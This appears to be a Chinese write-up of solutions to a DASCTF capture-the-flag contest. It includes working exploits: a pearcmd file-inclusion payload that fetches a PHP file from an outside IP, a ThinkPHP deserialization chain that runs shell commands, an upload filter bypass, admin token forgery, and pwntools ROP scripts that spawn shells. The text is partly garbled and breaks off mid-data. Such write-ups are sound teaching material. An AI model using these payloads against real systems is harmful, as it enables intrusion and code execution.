web
OA?RCE?
?赛的时候试了下不是弱?令(实际上就是admin123,但当时忘试这个了),所以就去?上找了改密码
的?式,?这?的?法:信呼oa最新版本代码审计 - ma4ter
$test = $this->jm-
>strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")),
'd41d8cd98f00b204e9800998ecf8427e');
echo $test;
拿到31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UmMnRnZ!GZIXUmqvZUmqEnpmbza2h
npdbtg::
然后post传过去,?admin/lighting登陆即可
拿到后台权限过后,进?源码审计,在indexAction.php处找到可以看phpinfo的地?
传值: ?m=index&a=phpinfo ,发现 register_argc_argv 是开着的
同时这处代码可以进??件包含
所以可以考虑包含pearcmd来下载?件,最后再来包含下载的?件
构造
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2xpYi9waHAvcGVhcmNtZA=
=&+install+-R+/tmp+http://1.14.92.24/1.php
//surl=…/…/…/…/…/usr/local/lib/php/pearcmd
这?有?个?trick,?先是源码已经给了php后缀,所以不需要在pearcmd后?加php了,再有就是要
进??录穿越(多来?个穿越路径,否则打不通)
然后去访问?录即可,构造:
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3RtcC9wZWFyL2Rvd25sb2F
kLzE=
//surl=…/…/…/…/…/…/…/tmp/tmp/pear/download/1
接着构造1.php
?>
打的步骤就还是和上??样了,先下载,然后访问即可拿到flag
DASCTF{915aa19ab2d56a9d9340938eb5a01d9e}
easyupload
?source=1看到源码
能上传?件有?些限制
if(stristr($filename,'p') or stristr($filename,'h') or stristr($filename,'..'))
{
die('no');
}
$file_conents = file_get_contents($_FILES['file']['tmp_name']);
if(strlen($file_conents)>28 or stristr($file_conents,'<')){
die('no');
}
?件名不能有p和h,?且内容?度不超过28。
可以上传.user.ini,因为?度不超过28,可以为
auto_prepend_file="/flag"
使其?动包含/flag,之后找到?个php?件访问就?。
看latte模版会?成?个php缓存?件,且?件?成规则如上图,每个版本?件名固定。
本地搭环境(要在linux),去github上找latte测试。
简单看?下 加密规则为key的md5结果前?位
a:4:{i:0;s:19:“tempdir/index.latte”;i:1;s:6:“版本号”;i:2;a:7:
{i:0;s:5:“clamp”;i:1;s:11:“divisibleBy”;i:2;s:4:“even”;i:3;s:5:“first”;i:4;s:4:“last”;i:5;s:3:“odd”;i:6;s:5:"slice
";}i:3;b:1;}
所以?成缓存?件名为index.latte–key加密结果.php
之后在尝试2.10.4的时候有了结果,?件名为index.latte–6f26bb0dba.php
回到题?,构造?个传?件html
<!DOCTYPE html>
<html lang="en"> <head>
<meta charset="UTF-8">
<title>Title</title>
</head> <body> <h1>hello worlds</h1> <form action="http://2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezuploadctf.dasctf.com:2333/" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></p>
<p><input type="submit" value="submit"></p>
</form>
</body>
</html>
先发包
POST / HTTP/1.1
Host: 2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezupload-ctf.dasctf.com:2333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------------------------
-165383841511425975052999558491
Content-Length: 260
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Upgrade-Insecure-Requests: 1
-----------------------------165383841511425975052999558491
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: application/octet-stream
auto_prepend_file="/flag"
-----------------------------165383841511425975052999558491--
之后访问/tempdir/index.latte–6f26bb0dba.php
DASCTF{a3cb921465600f49b52b9ac907a38edb}
灏妹的web
扫就完事了,访问/.idea/dataSources.xml
DASCTF{09957769e7c24dddefc1ef615539c9ac}
EasyTp
有个file参数,直接读/etc/passwd提示harcker,伪协议读源码
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index()
{
if (isset($_GET['file'])) {
$file = $_GET['file'];
$file = trim($file);
$file = preg_replace('/\s+/','',$file);
if(preg_match("/flag/i",$file)){ die('<h2> no flag..');}
if(file_exists($file)){
echo "file_exists() return true..</br>";
die( "hacker!!!");
}else {
echo "file_exists() return false..";
@highlight_file($file);
}
} else {
echo "Error! no file parameter <br/>";
echo "highlight_file Error";
}
}
public function unser(){
if(isset($_GET['vulvul'])){
$ser = $_GET['vulvul'];
$vul = parse_url($_SERVER['REQUEST_URI']);
parse_str($vul['query'],$query);
foreach($query as $value)
{
if(preg_match("/O/i",$value))
{
die('</br> <h1>Hacking?');
exit();
}
}
unserialize($ser);
}
}
}
有个反序列化,要绕parse
https://www.cnblogs.com/tr1ple/p/11137159.html
绕过?法///public/index.php/index/unser?vulvul=
绕过之后?上找条链?就?
<?php
namespace think\model\concern{
trait Attribute{
private $data = [7];
}
}
namespace think\view\driver{
class Php{}
}
namespace think{
abstract class Model{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
protected $table;
function __construct($cmd){
$this->lazySave = true;
$this->withEvent = false;
$this->table = new route\Url(new Middleware,new Validate,$cmd);
}
}
class Middleware{
public $request = 2333;
}
class Validate{
protected $type;
function __construct(){
$this->type = [
"getDomainBind" => [new view\driver\Php,'display']
];
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{}
}
namespace think\route{
class Url
{
protected $url = 'a:';
protected $domain;
protected $app;
protected $route;
function __construct($app,$route,$cmd){
$this->domain = $cmd;
$this->app = $app;
$this->route = $route;
}
}
}
payload
///public/index.php/index/unser?vulvul=
O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00la
zySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00% 2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%0
0url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A26%3A%22%3C%
3Fphp+system%28%22cat+%2F%2A%22%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3B O%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B% 7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A7
%3A%22%00%2A%00type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi
%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%
22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7B i%3A0%3Bi%3A7%3B%7D%7D
DASCTF{ee6db14d381babe4f78be657ee473cba}
pwn
string_go
思路
通过计算器算出的答案为3进?lative_func函数,发现通过输?负数可以溢出吐出地址leak libc基地址,
再通过memcpy函数进?栈溢出
然后就是基本的栈溢出构造rop链进?攻击
exp
#coding=utf-8
from pwn import *
context(log_level='debug',arch='amd64')
binary='./string_go'
main_arena = 0x3ebc40
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 1
if local == 1:
io=process(binary)
else:
io=remote('82.157.20.104',50100) e=ELF(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ru('>>> ')
sl('1+2')
#gdb.attach(io)
ru('>>> ')
sl('-2')
ru('>>> ')
sl('a')
ru('>>> ')
sl('1')
io.recv(0x28)
libc_base=u64(io.recv(8))-0x730157
io.recv(8)
canary=u64(io.recv(8))
su('canary',canary)
system = libc_base+libc.symbols['system']
binsh = libc_base+next(libc.search(b'/bin/sh'))
ret = libc_base+next(libc.search(asm('ret')))
pop_rdi = libc_base+next(libc.search(asm('pop rdi\nret')))
#gdb.attach(io)
sl(b'a'*0x18+p64(canary)+p64(0)*3+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))
shell()
blind
思路
栈溢出,但是没有输出函数,?开始?ret2dlreslove来写,能leak地址把能?的libc都?了,后?发现匹
配的libc都?效,尝试了?次?果放弃,找新思路,附上原来的exp。
在这里插入代码片
#coding=utf-8
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64')
binary='./blind'
main_arena = 0x3ebc40
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 0
if local == 1:
io=process(binary)
else:
io=remote('82.157.6.165',27200)
elf=ELF(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
one_gadget = [0x4f3d5,0x4f432,0x10a41c]
read_plt = elf.plt['read']
read_got = elf.got['read']
fun_addr = 0x4006B6
'''
Gadgets information
============================================================
0x00000000004007bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007be : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop r14 ; pop r15 ; ret
0x00000000004007c2 : pop r15 ; ret
0x00000000004007bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007bf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop rbp ; ret
0x00000000004007c3 : pop rdi ; ret
0x00000000004007c1 : pop rsi ; pop r15 ; ret
0x00000000004007bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400549 : ret
'''
# bss
bss = elf.bss()
l_addr = libc.sym['write'] - libc.sym['read']#libc.sym['system'] -
libc.sym['read']
r_offset = bss + l_addr * -1
if l_addr < 0:
l_addr = l_addr + 0x10000000000000000
pop_rdi = 0x00000000004007c3
# pop rsi ; pop r15 ; ret
pop_rsi = 0x00000000004007c1
plt_load = 0x400556
payload = b'a' * 0x58 + p64(pop_rsi) + p64(bss + 0x100) + p64(0) + p64(pop_rdi) + p64(0) + p64(read_plt) + p64(fun_addr)
raw_input()
sleep(1)
io.sendline(payload)
dynstr = 0x4003B8
fake_link_map_addr = bss + 0x100
fake_dyn_strtab_addr = fake_link_map_addr + 0x8
fake_dyn_strtab = p64(0) + p64(dynstr) # fake_link_map_addr + 0x8
fake_dyn_symtab_addr = fake_link_map_addr + 0x18
fake_dyn_symtab = p64(0) + p64(read_got - 0x8) # fake_link_map_addr + 0x18
fake_dyn_rel_addr = fake_link_map_addr + 0x28
fake_dyn_rel = p64(0) + p64(fake_link_map_addr + 0x38) # fake_link_map_addr +
0x28
fake_rel = p64(r_offset) + p64(0x7) + p64(0) # fake_link_map_addr + 0x38
fake_link_map = p64(l_addr)
fake_link_map += fake_dyn_strtab
fake_link_map += fake_dyn_symtab
fake_link_map += fake_dyn_rel
fake_link_map += fake_rel
fake_link_map = fake_link_map.ljust(0x68, b'\x00')
fake_link_map += p64(fake_dyn_strtab_addr)
fake_link_map += p64(fake_dyn_symtab_addr) # fake_link_map_addr + 0x70
fake_link_map += b'/bin/sh'.ljust(0x80, b'\x00')
fake_link_map += p64(fake_dyn_rel_addr)
sleep(1)
io.sendline(fake_link_map)
sleep(1)
#gdb.attach(io)
#raw_input()
sleep(4)
rop = b'A' * 0x58 + p64(pop_rdi) +p64(1)+p64(pop_rsi)+ p64(0x601018) + p64(0) +p64(plt_load) + p64(fake_link_map_addr) + p64(0)+p64(fun_addr)
io.sendline(rop)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('alarm',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('read',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('__libc_start_main',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('setvbuf',leak)
libc = LibcSearcher('setvbuf', leak)
libc_base = leak - libc.dump('setvbuf')
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('sleep',leak)
pay = b'a'*0x58 + p64(pop_rdi) + p64(fake_link_map_addr + 0x78) + p64(libc_base
+ libc.dump('system'))
sl(pay)
io.interactive()
通过leak出的地址下?,发现在alarm附近有syscall调?
尝试通过ret2csu部分修改alarm的got表(最后1字节改为原来偏移加上5即\xd5)得到syscall,通过
read控制寄存器rax为0x3b调?号,布置参数拿到shell
exp
from pwn import *
#from LibSearcher import *
context.log_level = "debug"
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 1
if local == 1:
io=process("./blind")
else:
io=remote('82.157.6.165',27200)
#libc = ELF("")
elf = ELF("./blind")
def gadget(addr,di,si,dx):
bx=0
bp=1
r12=addr
r13=dx
r14=si
r15=di
pay=p64(0x4007BA)+p64(bx)+p64(bp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)+p64(0x400
7A0)+b'a'*7*8
return pay
gdb.attach(io)
pop_rdi = 0x00000000004007c3
pop_rsi_r15 = 0x00000000004007c1
payload = b"a" * 0x58
payload += gadget(elf.got["read"],0,elf.got["alarm"],1)
REVERSE
虚假的粉丝
歌能听,IDA直接看算法,很容易看出,读??件是由第?次输?内容决定,读取偏移是第?次决定,读
取??是第三次决定
payload += gadget(elf.got["read"],0,0x601088,0x3b)
payload += gadget(elf.got["alarm"],0x601088,0,0)
payload += (0x500 - len(payload)) * b"\x00"
s(payload) s("\xd5") s("/bin/sh\x00" + "a" * (0x3b-8))
shell()
REVERSE
虚假的粉丝
歌能听,IDA直接看算法,很容易看出,读??件是由第?次输?内容决定,读取偏移是第?次决定,读
取??是第三次决定
算法实际上就是?个整数转?度为4?本的过程,?如1就转为0001,40转为0040,?读取??很容易
看出来是》=40,我默认为40
?于偏移,则要找到那个?件,题?为了满?条件,?件应该是唯?的,写?个脚本来跑吧
?先要满?有U和S,先不管那么多,把有这两个字符串的?件给弄出来
很幸运的是,只有?个?件满?:“ASCII-faded 4157.txt”
直接??具去看,算好偏移0x45E
?此得出3个数字
4157
1118
40
这?段只需要满?第?个字符为A,第11个字符为S即可
剩下的就是位或和装逼放?乐
解码
得到 S3Cre7_K3y = Al4N_wAlK3R,把key输?进去然后就开始放?乐,然后去看5315.txt
把它缩放就出来了,A_TrUe_AW_f4ns
gghdl
先下个断点动态调试,发现?较加密结果,发现是逐字节加密,并且猜出位或的常数:0x9C
Dump出数据,直接写脚本解密
解出flag:06291962-abad-40c8-8318-f0a6b186482c
TacticalArmed
IDA F5,只能判断出字符串?度是0x28,以及循环次数,加密算法不得?知
?OD进?调试,发现是?个?较特殊的smc
由此,可以猜出,图下函数是计算将要执?的代码,并写?,因为是个循环,所以会覆盖上次的写?,
图下是?个代码拼接的过程
当然我选择了逃课,使?动态调试,让他?解码,然后收集算法段的所有汇编代码,在将收集好的汇编
代码,写?原函数
我?较喜欢偷懒,是这样做的,只dump出来了?次循环的算法段,然后写?,修复了部分jcc,然后保
存,丢IDA看算法
看结构,不难发现是Tea算法,?405000之类的可以通过动态得到,坑点在于sum,他并不会刷新sum,
会保留上次计算后的sum,所以写脚本时要注意sum
脚本如下
ROR
IDA直接看,逻辑??了然,很容易看出来,位移位数是?个固定序列,通过动态调试可以确定
加密是8个字节?组进?分组加密
假设密?是 m1,m2,m3,m4,m5,m6,m7,m8 共8个字节
则明?的第n(0=<n<=8)个字节则是将每个密?的第n取出来,依次倒叙放置在?进制位
这样说或许有点抽象,直接上脚本
Misc
真·签到
YUSA的?秘密
这题跟去年的ByteCTF的 Hardcore Watermark 01 ?乎?模?样,官?wp链
接:
https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#
这题采?的不是RGB通道的LSB隐写,?是采?的YCrCb通道。通过 cv2.cvtColor(img,
cv2.COLOR_BGR2YCrCb) 对 img 图?数据进??彩空间转换,即可得到三个通道的数据,然后对三个通
道的数据分别根据奇偶做?值化处理并保存为图?
cv.imwrite('a.png', (a % 2) * 255) #对三个通道中的数据分别根据奇偶做?值化处理,并分
别保存为图?
cv.imwrite('b.png', (b % 2) * 255)
cv.imwrite('c.png', (c % 2) * 255)
所以完整脚本如下:
from cv2 import *
import cv2 as cv
img=cv2.imread('C:\\Users\\YiJiale\\Desktop\\yusa\\yusa.png')
src_value=cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb) a, b, c = cv.split(src_value) #使?cv.split分离通道
cv.imwrite('a.png', (a % 2) * 255) #对三个通道中的数据分别根据奇偶做?值化处理,并分
别保存为图?
cv.imwrite('b.png', (b % 2) * 255)
cv.imwrite('c.png', (c % 2) * 255)
运?后会得到三个通道的图?,在其中 a.png 即可清晰看到flag
DASCTF{2947b683036d49e5681f83f7bc3fbb34}
Yusa的秘密
下载附件,发现这是?个内存取证的题?,先?命令获取?下 内存镜像的进程
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 psxview
这些进程都分析了?下,发现有StikyNot.exe进程,这是windows的便签程序,可以尝试寻找snt?件来
查看便签的内容。这?就直接来?filescan查找?件,?windows的findstr命令筛选?下,先查看下压
缩包
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r 'zip'
有?个 key.zip 。直接使?命令dump下来,重命名为1.zip
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003f3356f0 -D
C:\Users\YiJiale\Desktop\取证
??是?个exp?件,但是压缩包加密了,需要寻找密码
刚刚查找进程提到过便签的进程,这?来尝试查找?下snt?件
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "snt"
发现了便签?件,我们将他dump下来查看
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003fb306e0 -D
C:\Users\YiJiale\Desktop\取证
将其重命名为 StickyNotes.snt ,?记事本打开是看不到上?东?的,既然数win7的便签,我们就将
其传?win7虚拟机尝试打开(这?因为VMware tools始终?法装上,便采?QQ传输?件),后来发现 家
庭普通版的Win7居然没有便签这个程序,我是Win11,没有便签程序,于是我尝试下Win10虚拟机
将snt?件放?C:\Users\YiJiale\AppData\Roaming\Microsoft\Sticky Notes\路径下,然后打开便签程
序,便可以得到
得到了?个密码: 世界没了?跳
?这个密码成功打开刚刚的exp的压缩包,得到exp?件
from PIL import Image
import struct
pic = Image.open('key.bmp')
fp = open('flag', 'rb')
fs = open('Who_am_I', 'wb') a, b = pic.size
list1 = []
for y in range(b):
for x in range(a):
pixel = pic.getpixel((x, y))
list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1],
pixel[0]])
data = fp.read()
for i in range(0, len(data)):
fs.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))
fp.close()
fs.close()
通过分析exp可以发现,?前还缺少两个?件便可以得到flag?件,分别是Who_am_I和key.bmp?件
这?Who_am_I,既然是Yusa的秘密,那?户应该就是Yusa了,使?命令来获取?下?户名的hash密码
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 hashdump
使? Passware Kit 13 来破解Yusa?户的密码
打开软件,点击 Memory Analysis 功能,再选择 Windows User 功能
发现得到了密码为: YusaYusa520
成功打开了Who_am_I的压缩包得到了Who_am_I?件,题?描述中出现了Sakura组织,所以这?也查
找?下相关?件
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "Sakura"
这?得到的部分结果含有中?,在Windows?就乱码了,不过不影响,我们dmup?下第?个?件
Sakura-didi ,并且重命名为2.zip
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e58ada0 -D
C:\Users\YiJiale\Desktop\取证
打开压缩包,??确实是key.bmp?件,但是还是需要密码,接下来就只需要去找密码了
联想到?开始分析进程的时候,除了便签程序,还有?个平时很少遇到过的 wab.exe ,这是通讯录的程
序,我们试着找?下其中的联系?,联系?contact?件,?filescan搜索?下
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "contact"
?共得到了两个联系?的?件,分别是Yusa.contact和Mystery Man.contact
我们分别dump下来分析?下
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e748f20 -D
C:\Users\YiJiale\Desktop\取证
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003fa09070 -D
C:\Users\YiJiale\Desktop\取证
打开??是base64编码,解码得到?张Yusa的bmp图?
但这并不是我们想要的东?,接着看另?个联系??件
发现是base32编码,后?还有?段base,接着解密
得到了key: 820ac92b9f58142bbbc27ca295f1cf48 ,这应该就是key.bmp的密码了
成功得到了,接着把?件都跟刚刚的exp放同?个?录下尝试运?
运?完成后,并没有看到flag,后来发现,flag跟Who_am_I?件需要在exp中互换?下位置
因为刚刚运?了?下导致Who_am_I为空了,所以这?重新导?Who_am_I?件,运??下,得到了?张
gif图,我们改?下后缀,发现是在放烟花
逐?分帧查看后得到了flag
DASCTF{c3837c61-77f1-413e-b2e6-3ccbc96df9f4}
Cry
HardRSA
原题为2020?城杯power,这题只是改了下数据
参照blog:https://blog.csdn.net/qq_52193383/article/details/120417567
由于需要解出p,于是将d*ep-1的因数都放在列表中进?爆破得出即可
from Crypto.Util.number import *
import sympy
e = 0x10001
dp =
3794769731581465508310049527476439944399404356564837722690130815805325396401890
20020958796514224150837680366977747272291881285391919167077726836326564473
c =
5724825894592738767357946734810611874703438119070377786140952733627291455969949
0353325906672956273559867941402281438670652710909532261303394045079629146156340
8019322548390215741399439334519240628884267263532307572845828639932275927033231
3326518041438206213258052665820571621804636624765388176465889131559260719435573
3209493239611216193118424602510964102026998674323685134796018596817393268106583
7371535166329690416932807252979292777511360405468302305338985146597147172133716
1985313727251596706700880552105161310714155578851689422365485127778539335517811
4230929014037436770678131148140398384394716456450269539065009396311996040422853
7400495085005402814881712852334457447996800223071804522107939136141316468759496
98079917313572873073033804639877699884489290120302696697425
c1 =
7810013146187228561342624432273750214721948510879913097520242963804285948813693
3783498210914335741940761656137516033926418975363734194661031678516857040723532
0554486959288206240944004814649501811266384562346698149824112709856502092456877
6559548373887697557252127696314954265918768007591732230851216390442329738163553
2771690434016589132876171283596320435623376283425228536157726781524870348614983
1164088150882576097885179868106225059615388128899531856842564695403698098631039
4832644409071516135119822916319013090366187463102030448184271508610424399880838
2859633753938512915886223513449238733721777977175430329717970940440862059204518
2241267928229121414792607912323125447483014126362224988416767422083906223530226
6832080920131272493686216735070982358187072283132940635901029312101976416001631
6259432749291142448874259446854582307626758650151607770478334719317941727680935
2438203131448298260819555397785705652329354632011351100498612044322850600292372
2951829729167911416526580886286282721119371115915299242713317617779604598157275
8903474465179346029811563765283254777813433339892058322013228964103304946743888
2130683976725408632608833146654920887935547756746109946395372635882760769929077
3515370200200100538332144297409762678669989599354458157245747643785377879488894
5238622869401634353220344790419326516836146140706852577748364903349138246106379
9546470025570911314756692959971964845481995073354214995569859491391626395606229
73283109342746186994609598854386966520638338999059
pd=e*dp-1
#pd的因数
x1 = 2*2*2
x2 = 5*5*5
x3 = 11#4
x4 = 41#14
x5=1601
x6=
3444324900854018691451375538323794920803430274540022378363067197129200160431751
7467760001228656574360327813700999822705311707622772084593433128231017
ff=[2,4,8,5,25,123,11,41,1601]
'''for i in ff:
for j in ff:
for k in ff:
if sympy.isprime(pd // i// j // k + 1)==True:
print(i,j,k)
break''' #爆破得出为2,25,41
flag
###
密码?集合
直接nc上去,得到?副矩阵,上?有 我要拿?湖论剑第? 的字样,看起来很像数独游戏
p = pd//41//2//25 + 1 d=dp
k = 0
while True:
d = dp + k * (p-1)
m = pow(c,d,p)
flag = long_to_bytes(m)
if b'DAS' in flag or b'flag' in flag:
print(flag)
break
k += 1 #flag:DASCTF{98d923h4344e3bf72f8775xy65tvftv5}
DASCTF{98d923h4344e3bf72f8775xy65tvftv5}
密码?集合
直接nc上去,得到?副矩阵,上?有 我要拿?湖论剑第? 的字样,看起来很像数独游戏
把 我要拿?湖论剑第? 转化为 1-9 的数字,找?个在线?站填上去
在线?址:https://shudu.gwalker.cn/
得到结果后,按照先读??格再读??格的顺序依次写出来,得到
6291534784572683911839475263159467828461729352793586145618942377895236144327618
95
然后再把这些数字按照刚刚的转换顺序,再转回汉字,写个?脚本
num= [6,2,9,1,5,3,4,7,8,4,5,7,2,6,8,3,9,1,1,8,3,9,4,7,5,2,6,3,1,5,9,4,6,7,8,2,8,4,6, 1,7,2,9,3,5,2,7,9,3,5,8,
6,1,4,5,6,1,8,9,4,2,3,7,7,8,9,5,2,3,6,1,4,4,3,2,7,6,1,8,9,5]
for i in num:
if i == 1:print('我',end='')
if i == 2:print('要',end='')
if i == 3:print('拿',end='')
if i == 4:print('?',end='')
if i == 5:print('湖',end='')
if i == 6:print('论',end='')
if i == 7:print('剑',end='')
if i == 8:print('第',end='')
if i == 9:print('?',end='')
运?得到
论要?我湖拿?剑第?湖剑要论第拿?我我第拿??剑湖要论拿我湖??论剑第要第?论我剑要?拿湖要剑
?拿湖第论我?湖论我第??要拿剑剑第?湖要拿论我??拿要剑论我第?湖
把这个粘贴回虚拟机?,Enter?下,即可得到flag
DASCTF{043d3b517abe53a8c8a815e56e9cda6f}
unknown_ds
?道DSA的题?,给了相关的r和s,但是没有给hm1和hm2,所以我们要从后?去求得hm1和hm2,再
来对前?进?判断。
先看main函数,我们知道:
ul[i]2-wl[i]vl[i]2=1
且我们已知wl[i],搜索
x
2
?
c
y
2
=
1
x^2-cy^2=1
x2?cy2=1知道这个东?叫佩尔?程,它的所有解由基本解构成,?上找了求
基本解的脚本的?站
?这个脚本跑出三个wl[i]的基本解,我们猜测这个ul[i],vl[i]不会太?(佩尔?程??项后?的数字将会
爆炸),所以我们对于每个wl[i]爆破??五项可能的解,并通过扩展中国剩余定理求得KaTeX parse error: Undefined control sequence: \ at position 13: m_1^e \ mod \? ?ul[0]ul[1]ul[2]以及
m
2
e
?
m
o
d
?
v
l
[
0
]
v
l
[
1
]
v
l
[
2
]
m_2^e \ mod \ vl[0]vl[1]vl[2]
m2e??mod?vl[0]vl[1]vl[2]的值,尝试对这两个值直接开e次?,得到
m1,m2。
假设(p-1)//q=d,我们容易知道,?概率有p//q=d,并且d?常?,这就说明q相对来说?较?,所以p近
似等于dq,dq*q=n,q≈(n//d)^1/2,开根后得q,然后得p,求得
- P.q之后按DSA签名步骤解密即可
Exp
from sympy import sqrt
from Crypto.Util.number import *
from fractions import Fraction as Frac
from Crypto.Hash import SHA
from functools import reduce
def gcd(a, b):
if b==0: return a
return gcd(b, a%b)
def lcm(a, b):
return a * b // gcd(a,b)
def exgcd(a, b):
if b==0: return 1, 0
x, y = exgcd(b, a%b)
return y, x - a//b*y
def uni(P, Q):
r1, m1 = P
r2, m2 = Q
d = gcd(m1, m2)
assert (r2-r1) % d == 0
l1, l2 = exgcd(m1//d, m2//d)
return (r1 + (r2-r1)//d*l1*m1) % lcm(m1, m2), lcm(m1, m2)
def CRT(eq):
return reduce(uni, eq)
def continued_fraction(n):
a = sqrt(n)
while True: ? yield (int(a))
? a = 1 / (a - int(a))
def pell(n):
if int(sqrt(n))**2 == n: ? return (1, 0)
l = []
for i in continued_fraction(n):
? a = Frac(i) ? for j in l[::-1]:
? a = j + 1 / a ? if a.numerator**2 - n * a.denominator**2 == 1: ? return (a.numerator, a.denominator) ? l.append(i)
return l
wl=[3912956711, 4013184893, 3260747771]
xl=[]
yl=[]
R1, S1, S2=498841194617327650445431051685964174399227739376,
376599166921876118994132185660203151983500670896,
187705159843973102963593151204361139335048329243
R2, S3=620827881415493136309071302986914844220776856282,
674735360250004315267988424435741132047607535029
for i in range(3):
a1,a2=pell(WI[i])
t1=[a1]
t2=[a2]
tx=a1
ty=a2
for j in range(25):
tx,ty=tx*a1+wl[i]*ty*a2,tx*a2+ty*a1
t1.append(tx)
t2.append(ty)
xl.append(t1)
xl.append(t2)
c1= [285258922377992879626654060042167879088906728491168257892421618605259039359564
5322161563386615512475256726384365091711034449682791268994623758937752874750918
2009618889970824771008110257218987207836668686234982462196772211062276608955190
58631965055790709130207760704,
2111584990618013965631066460745842563767052008198324825898416602622289875350500
8904136688820075720411004158264138659762101873588583686473388951744733936769732
617279649797085152057880233721961,
3018991790921859647858477051669501812556772722943778230450112050353184634966827
8828965117763534189430853778744914819958349011705952697175980442697794795272126
6880757177055335088777693134693713345640206540670123872210178680306100865355059
146219281124303460105424]
c2= [148052450029409767056623510365366602228778431569288407577131980435074529632715
0149711334526260212269446322824793123786673537921171334520699723341693868372272
